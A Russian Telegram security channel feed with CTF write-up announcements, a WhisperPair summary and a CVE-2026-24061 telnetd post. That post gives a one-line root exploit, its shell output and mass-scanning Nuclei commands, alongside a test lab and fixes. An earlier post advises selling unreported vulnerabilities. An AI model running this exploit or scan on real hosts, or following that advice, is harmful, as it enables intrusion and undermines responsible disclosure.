(S_K)
288 subscribers
268 photos
128 videos
13 files
93 links
Михаил & Ко
Download Telegram
Фоточки с кубка
🔥7🤯1
Теперь я почти официально дипломированный специалист по разработке встроенного программного обеспечения робототехнических устройств! Только сам диплом дадут в конце 4 курса, пока что только справка, о том, что я крутой. Также хочу потом пойти в магистратуру. 3 высший образования, звучит интересно)
🔥6
Media is too big
VIEW IN TELEGRAM
Мне кажется, что будет полезно, если я начну потихоньку разбирать задания некоторых CTF. В планах делать разборы на категории web и pwn. Пока что начну с сайта DUCKERZ, дальше посмотрим, первый разбор, как вводная суперпростая тачка на #pwn
👍2
Небольшая памятка мне на будущее. В случае обнаружения уязвимости в компании, у которой нет bug bounty программы, нет смысла сообщать о ней руководству или разработчикам. Проще либо проигнорировать, либо продать её где-нибудь. Потому что я ебал за "спасибо" работать
6
Media is too big
VIEW IN TELEGRAM
Продолжаю разбирать задания по #pwn с сайта DUCKERZ, сегодня получим шелл через перезапись got plt во втором по сложности задании "Простой калькулятор"
👍3
Также заранее извиняюсь за качество, capcut его сильно побил
Media is too big
VIEW IN TELEGRAM
Разбор предпоследней таски из решённых мною. Это уже medium уровень, хотя я бы её к таковому не отнёс. В видосе эксплуатирую use-after-free #pwn
1
В этот раз, в таске hostel я по просьбе DUCKERZ не показываю сам флаг. А лишь демонстрирую один из методов решения
— Food ninja, насколько ты доверяешь телеграму и уверена в том, что я владею данным номером телефона?
— На все 100!

Несмотря на то, что я ранее говорил, что не буду больше писать компаниям об уязвимостях. Я обязан осветить этот рофлельный метод захвата аккаунтов. На текущий момент я просто отписался в отдел техподдержки и всё им рассказал. Сам эксплоит не дам, пусть он и супер простой, просто имейте в виду, что если пишите тг ботов, не доверяйте отправленным номерам телефона в формате контактов)
1
Всех с новой годой по МСК+2. Желаю всем в этом году всего всего всего. Желаю безопасникам в этом тгк весёлых багов и больших баунти, а остальным быть в безопасности и не попадаться на уловки мошенников🎉
3
Hacking_Cheatsheet.md
25 KB
Мне показалось полезным наконец-то структурировать все свои файлы с заметками в 1. Объединял их gemini, но я прочитал, в целом, +- это что надо. Эту инфу я собрал в течение года, с разных ctf райтапов, тасок с htb и thm, а также с видосов на ютубе и статей
5
Media is too big
VIEW IN TELEGRAM
А вот и четвёртый разбор pwn тасок с duckerz, если в ближайшее время мне будет не лень, то я запишу и пятый. На текущий момент мне осталось разобраться с 2 тасками до завершения всех.

Сегодня в видео разместим shellcode на стеке и вспомним про конвенцию вызовов в Linux x86_64. #pwn
1
Media is too big
VIEW IN TELEGRAM
Сегодня нет настроения доснимать пятый pwn из 6, поэтому для разнообразия решил и разобрал самую сложную и дорогую по очкам таску на #web со всё тех же DUCKERZ.
5
Флаг всё также не раскрываю
4😁2
# WhisperPair (CVE-2025-36911): критическая уязвимость в Google Fast Pair

В рамках недавнего раскрытия уязвимости WhisperPair стало известно о критическом недостатке в реализации протокола Google Fast Pair, который затрагивает сотни миллионов Bluetooth-аудиоустройств (наушники, колонки) таких брендов, как Google, Sony, JBL, Xiaomi и др.

## Техническая суть

Проблема кроется в нарушении логики работы конечного автомата (state machine) на стороне аксессуара. По спецификации Fast Pair устройство должно игнорировать запросы на сопряжение, если оно не находится в режиме «Pairing Mode» (активируемом физической кнопкой).

Однако на практике многие производители не реализовали проверку текущего состояния. Это позволяет атакующему:

Принудительное сопряжение 
Находясь в радиусе действия Bluetooth (до 14 метров), злоумышленник инициирует процедуру Fast Pair. Аксессуар отвечает на запрос даже в процессе активного использования легитимным владельцем.

Перехват управления 
После обмена ключами Fast Pair атакующий завершает стандартное Bluetooth-подключение. Это дает полный контроль над аудиопотоком: можно прослушивать окружение через встроенные микрофоны или транслировать любой звук.

Tracking & Takeover 
Если устройство ранее не было привязано к Android-аккаунту (например, используется с iPhone), атакующий может первым записать в память устройства свой Owner Account Key. Это позволяет добавить чужой девайс в свою сеть Google «Найти устройство» и отслеживать геопозицию жертвы в реальном времени.

## Реализация и защита

Уязвимость критична тем, что её невозможно отключить на стороне смартфона — проблема именно в прошивке аксессуара. Исследователи из KU Leuven подтвердили успешную атаку в 68% протестированных моделей.

На GitHub уже опубликован публичный эксплоит, который позволяет автоматизировать поиск уязвимых устройств в радиусе видимости и проводить атаку без физического доступа.

Сам эксплоит
---

*Владельцам затронутых устройств рекомендуется следить за обновлениями прошивок от производителей.*
😁4🤨2
CVE-2026-24061: root через telnet одной командой

Нашли критическую уязвимость в GNU inetutils telnetd, которая даёт root без пароля. CVSS 9.8/10.

Суть бага

В 2015 году в telnetd добавили новый шаблон логина с параметром %U:
/usr/bin/login -p -h %h %?u{-f %u}{%U}

Переменная окружения USER передаётся через telnet протокол (RFC 1572) и не санитизируется. Классический argument injection.

Эксплуатация

Одна команда:
USER="-f root" telnet -a target.com 23

Что происходит:
1. Telnet отправляет USER на сервер
2. Сервер подставляет в команду: /usr/bin/login -p -h hostname -f root
3. Флаг -f означает "skip authentication"
4. Получаем root shell

Результат:

root@target:~# id
uid=0(root) gid=0(root) groups=0(root)

Кого касается

- GNU inetutils telnetd (например 2:2.0-1+deb11u2)
- Системы без Kerberos
- IoT/embedded устройства где telnet всё ещё используется

В продакшене telnet обычно отключен, но на легаси и IoT железках встречается.

Nuclei template

Запилил автоматический шаблон для сканирования.

Базовое использование:
nuclei -t cve-2026-24061.yaml -u target.com:23 -code

Массовое сканирование:
nuclei -t cve-2026-24061.yaml -l targets.txt -code

Тестовая лаба

Поднять уязвимый контейнер:
docker build -t vuln-telnetd .
docker run -d -p 2323:23 vuln-telnetd
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code

Защита

1. Обновить inetutils
2. Отключить telnet, использовать SSH
3. Фильтровать порт 23 на фаерволе
4. Мониторить подключения

GitHub

Всё выложил на GitHub: https://github.com/Mr-Zapi/CVE-2026-24061

В репо готовый Nuclei template, Dockerfile для лабы, примеры использования.

Ссылки

NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-24061
Детальный анализ: https://www.safebreach.com/blog/safebreach-labs-root-cause-analysis-and-poc-exploit-for-cve-2026-24061/
Уязвимый коммит: https://codeberg.org/inetutils/inetutils/commit/fa3245ac8c288b87139a0da8249d0a408c4dfb87

---

#cve #telnet #nuclei #appsec
4